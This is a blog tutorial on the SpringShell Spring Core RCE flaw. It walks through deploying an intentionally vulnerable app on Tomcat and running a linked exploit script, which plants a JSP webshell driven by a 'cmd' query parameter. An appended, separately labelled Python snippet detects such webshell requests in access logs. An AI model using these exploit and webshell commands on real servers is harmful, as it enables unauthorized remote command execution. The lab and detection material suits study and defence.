
Thursday, March 31, 2022

Complete SpringShell RCE Exploit PoC and Vulnerable App


I present here a complete tutorial and PoC for the recent SpringShell vulnerability in the Spring Core module.

 


Running on Ubuntu (tested on 20.04) 

GitHub: https://github.com/agentzex/spring-shell-exploit-poc

Prerequisites:

App Preparation:

  • Download the spring web app from the 'app' directory in this repo
  • cd to it and run 'mvn package'
  • After it's done, cd to the 'target' directory which was created and copy the 'zex-poc.war' file

Deployment: tomcat-root-dir - should be '/opt/tomcat/' if you followed the above guide.

  • If you're running tomcat < 10 : copy the war file to 'tomcat-root-dir/webapps/'
  • If you're running tomcat 10:
    1. create a directory named 'webapps-javaee' in tomcat-root-dir
    2. copy the war file to this directory
    3. Tomcat will migrate the legacy J2EE war file automatically from that folder and will deploy it in 'tomcat-root-dir/webapps/'
  • Run tomcat with 'tomcat-root-dir/bin/catalina.sh run' and check for errors.
  • If everything worked, we can now run the poc.py file and use a browser to launch commands in the created webshell.
    1. Run python (or python3) pwn.py --url http://server.ip:8080/zex-poc/greeting
    2. Access via browser or other http client with GET: http://server.ip:8080/zex-poc/tomcatwar.jsp?pwd=j&cmd=whoami
    3. PWND
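
On the defensive side, the webshell requests from step 2 stand out in Tomcat's access log. The following is an added example, not part of the original post or the linked repo; it assumes Tomcat's default `common` access log pattern, and the sample log lines and the function name `find_webshell_requests` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed format: Tomcat AccessLogValve "common" pattern (%h %l %u %t "%r" %s %b).
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Constructed sample lines (documentation IP ranges); paths follow the PoC above.
SAMPLE_LOG = """\
198.51.100.7 - - [31/Mar/2022:10:01:12 +0000] "GET /zex-poc/greeting HTTP/1.1" 200 512
198.51.100.7 - - [31/Mar/2022:10:01:20 +0000] "GET /zex-poc/tomcatwar.jsp?pwd=j&cmd=whoami HTTP/1.1" 200 64
192.0.2.10 - - [31/Mar/2022:10:02:00 +0000] "GET /zex-poc/greeting?name=bob HTTP/1.1" 200 230
192.0.2.44 - - [31/Mar/2022:10:03:41 +0000] "GET /zex-poc/tomcatwar.jsp?pwd=j&cmd=id HTTP/1.1" 404 -
"""

def find_webshell_requests(lines):
    """Flag requests to a .jsp resource that carry a 'cmd' query parameter."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not an access-log line in the assumed format
        url = urlsplit(m["target"])
        params = parse_qs(url.query, keep_blank_values=True)
        if not url.path.lower().endswith(".jsp") or "cmd" not in params:
            continue
        findings.append({
            "client": m["host"],
            "time": m["time"],
            "path": url.path,
            "cmd": params["cmd"][0],
            "status": int(m["status"]),
            # 200: the JSP exists and answered; 404: a probe for a shell that is not there.
            "shell_present": m["status"] == "200",
        })
    return findings

if __name__ == "__main__":
    for f in find_webshell_requests(SAMPLE_LOG.splitlines()):
        state = "SHELL RESPONDED" if f["shell_present"] else "probe only"
        print(f'{f["time"]} {f["client"]} {f["path"]} cmd={f["cmd"]!r} -> {f["status"]} ({state})')
```

A hit with status 200 means a JSP answered a command-style request, so the next step is locating that file on disk and treating the host as compromised.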
